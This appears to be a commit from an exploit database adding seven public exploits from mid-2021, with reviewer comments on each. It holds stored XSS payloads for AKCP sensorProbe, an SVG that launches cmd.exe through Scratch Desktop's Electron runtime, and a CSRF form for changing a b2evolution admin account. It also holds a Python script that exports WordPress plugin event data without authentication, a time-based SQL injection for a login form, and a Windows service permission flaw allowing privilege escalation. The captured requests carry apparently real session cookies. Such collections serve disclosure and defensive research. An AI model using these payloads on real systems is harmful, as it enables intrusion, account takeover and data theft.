DB: 2021-07-03
7 changes to exploits/shellcodes
WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)
Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
parent 4f3cf46cbf
commit 5bd61e68a2
8 changed files with 530 additions and 0 deletions
67
exploits/hardware/webapps/50080.txt
Normal file
@ -0,0 +1,67 @@
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 07-01-2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www.akcp.com/
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
# Version: < SP480-20210624
# CVE: CVE-2021-35956

# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.


1) Stored Cross-Site Scripting via System Settings

POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save

2) Stored Cross-Site Scripting via Email Settings

POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save

3) Stored Cross-Site Scripting via Sensor Description

POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close

_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
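Review bot: none of the three requests shows how the session is supplied, although the description says the issue is exploitable by "remote authenticated attackers"; only request 3 carries a Cookie header (`CPCookie=sensors=400`) and nothing states whether that is the login session. Name the header or cookie that authenticates the POST so the requests can actually be replayed. Separately, the bodies are printed with the payload unencoded (`<svg/onload=alert`xss`>` inside an `application/x-www-form-urlencoded` body), so the `Content-Length` values given for requests 1 and 2 do not match the bodies as shown; say that the payload has to be percent-encoded on the wire, or show the encoded form. The `time=32e004c941f912` query parameter is reused in all three URLs and Referers without a word on whether it is required or per-session.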
39
exploits/multiple/webapps/50079.txt
Normal file
@ -0,0 +1,39 @@
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/

You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>

The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.

Example of regular cross-site scripting (XSS):

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>

The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>

The example above launches cmd.exe (Command Prompt) on Windows.

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
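Review bot: the affected-version information is inconsistent: the title says "Scratch Desktop 3.17", the header says "# Version: 3.10.2", and the body says Scratch Desktop prior to 3.17.1 and scratch-svg-renderer before 0.2.0-prerelease.20201019174008 are affected. Make the title read "< 3.17.1" and mark 3.10.2 (the linked installer) as the build that was tested. The RCE variant depends on `require('electron')` being reachable from an SVG `onerror` handler inside the Scratch Desktop renderer; the body asserts this works but should state that this reachability is what separates the Desktop (Electron) case from the web XSS, where the same SVG only yields script execution in the page.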
88
exploits/php/webapps/50081.txt
Normal file
@ -0,0 +1,88 @@
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp

######## Description ########

Allows to attacker change admin account details.

######## Proof of Concept ########

===> REQUEST <====

POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

## < SNIPP >

edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1




#### Proof-Of-Concept ####

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_gender" value="M" />
<input type="hidden" name="edited_user_ctry_ID" value="233" />
<input type="hidden" name="edited_user_rgn_ID" value="" />
<input type="hidden" name="edited_user_subrg_ID" value="" />
<input type="hidden" name="edited_user_city_ID" value="" />
<input type="hidden" name="edited_user_age_min" value="" />
<input type="hidden" name="edited_user_age_max" value="" />
<input type="hidden" name="edited_user_birthday_month" value="" />
<input type="hidden" name="edited_user_birthday_day" value="" />
<input type="hidden" name="edited_user_birthday_year" value="" />
<input type="hidden" name="organizations[]" value="1" />
<input type="hidden" name="org_roles[]" value="King of Spades" />
<input type="hidden" name="org_priorities[]" value="" />
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
<input type="hidden" name="uf_new[2][]" value="" />
<input type="hidden" name="uf_new[3][]" value="" />
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
<input type="hidden" name="new_field_type" value="0" />
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
<input type="hidden" name="ctrl" value="user" />
<input type="hidden" name="user_tab" value="profile" />
<input type="hidden" name="identity_form" value="1" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="orig_user_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
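Review bot: the PoC form hardcodes `crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl`, the same value captured in the REQUEST section, and `crumb_user` is by its name the form's anti-CSRF crumb. A cross-site request only works if the victim's crumb is static, guessable, or not checked, and the write-up does not say which; state how an attacker obtains a valid crumb for the victim's session, or show the request succeeding with the field removed or altered, otherwise the CSRF claim is unsupported. The captured request also carries live cookies from the demo host (`session_b2evo`, `__cmpconsentx19318`, `_ga`, `_gid`, `__gads`) that should be stripped before publication, and the description line "Allows to attacker change admin account details." should read "Allows an attacker to change admin account details."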
122
exploits/php/webapps/50082.py
Executable file
File diff suppressed because one or more lines are too long
69
exploits/php/webapps/50084.py
Executable file
@ -0,0 +1,69 @@
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24146
# CWE: CWE-863, CWE-284
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md

'''
Description:
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
versions before 5.16.5, did not properly restrict access to the export files,
allowing unauthenticated users to exports all events data in CSV or XML format for example.
'''


'''
Banner:
'''
banner = """
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/

* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
* @Hacker5preme

"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse
import csv

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


'''
Exploit:
'''
print('')
print('[+] Exported Data: ')
print('')
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
answer = requests.get(exploit_url)
decoded_content = answer.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
my_list = list(cr)
for row in my_list:
print(row)
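Review bot: the script declares success on any response: `requests.get(exploit_url)` is followed directly by `csv.reader(...)` with no check of `answer.status_code` or of the response `Content-Type`, so a patched site (or a `/wp-admin/` login redirect) returns HTML that is still printed as "rows" under "[+] Exported Data". Check that the response is CSV (or at least reject bodies containing `<html`) before printing. Three version strings disagree: the header says "Before 5.16.5", the banner says "< 5.16.2" and the title says "5.16.2"; the docstring says before 5.16.5, so align the other two with it. Minor: the argparse description is missing a space in "CalendarExport", `requests.get` has no `timeout`, and the URL hardcodes `http://`.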
48
exploits/php/webapps/50085.txt
Normal file
@ -0,0 +1,48 @@
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
# Exploit Author: ircashem
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04

####################
# Proof of Concept #
####################

POST /login.php HTTP/1.1
Content-Length: 456
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
Origin: http://localhost
DNT: 1
Referer: http://localhost/
Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Connection: close

-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="username"

admin
-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="password"

admin' AND (SELECT 1 from (select sleep(5))a) -- -
-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="submit"


-----------------------------238993435340593308934076060075--

###########
# Payload #
###########

username=admin
password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
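Review bot: the only evidence is the delay produced by `admin' AND (SELECT 1 from (select sleep(5))a) -- -` in the `password` field, i.e. a time-based blind injection; say so explicitly and pair it with a control request using `sleep(0)` so a slow server is not mistaken for a positive result. The request also carries the author's `PHPSESSID` cookie and a captured multipart boundary, neither of which is needed to reproduce, and the "Payload" section at the end only restates the two fields already shown in the request body; a single parameterised request listing `username`, `password` and `submit` would be clearer.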
90
exploits/windows/local/50083.txt
Normal file
@ -0,0 +1,90 @@
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
# Date: 2021-07-01
# Author: Andrea Intilangelo
# Vendor Homepage: http://nica.it - http://winwastenet.com
# Version: 1.0.6183.16475
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1

WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.

(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"

(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.

(3) Details:

C:\Users\user>sc qc winwasteservice
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: winwasteservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : WinwasteService
DIPENDENZE :
SERVICE_START_NAME : LocalSystem


C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file

C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R

C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file


C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE

CREATOR OWNER:(OI)(CI)(IO)(ID)F
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE

AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
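Review bot: the listings support the weak-ACL claim (`Everyone:(I)(M)` on `WinWasteService.exe` and `Everyone:(I)(OI)(CI)(M)` on the `WW.PROG` directory), but the advisory stops at "(2) Attack Vectors" without an exploitation step or a trigger. The service is `AUTO_START` under `LocalSystem`, and an unprivileged user has no right to stop or start it, so a replaced binary only runs at the next service start (reboot or an administrator restarting it); state that, and either list the DLLs meant by "any tied .dll" or drop that claim, since no DLL appears in the listings. The output comes from an Italian locale (`OPERAZIONI RIUSCITE`, `NOME_SERVIZIO`, `AUTORITÀ PACCHETTI APPLICAZIONI`, `Elaborazione completata per 1 file`); a one-line note that these are localized `sc`/`icacls`/`cacls` strings would help readers map them to English systems.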
@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
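Review bot: the new 50083 description, "WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control", has a grammar slip ("due Incorrect"); "Privilege Escalation due to Incorrect Access Control" reads correctly, and the matching title line in exploits/windows/local/50083.txt should be changed with it so the CSV and the file header stay in sync.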
@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",2021-07-02,"Tyler Butler",webapps,hardware,
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",2021-07-02,"Alperen Ergel",webapps,php,
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",2021-07-02,"Ron Jost",webapps,php,
50084,exploits/php/webapps/50084.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)",2021-07-02,"Ron Jost",webapps,php,
50085,exploits/php/webapps/50085.txt,"Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)",2021-07-02,ircashem,webapps,php,
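Review bot: two of the new descriptions carry versions that their own files contradict. 50079 is listed as "Scratch Desktop 3.17" while 50079.txt says "# Version: 3.10.2" and that versions "<3.17.1" are affected; "Scratch Desktop < 3.17.1" would be accurate. 50084 is listed as "Modern Events Calendar 5.16.2" while 50084.py says "# Version: Before 5.16.5" (its banner says "< 5.16.2"); "< 5.16.5" matches the CVE-2021-24146 text quoted in that file. The entries are all dated 2021-07-02 while the files carry 07-01-2021, 2021-06-18, 01.07.2021 and 02.07.2021; fine if the column is the publication date, but worth confirming since the two dates are used inconsistently across the set.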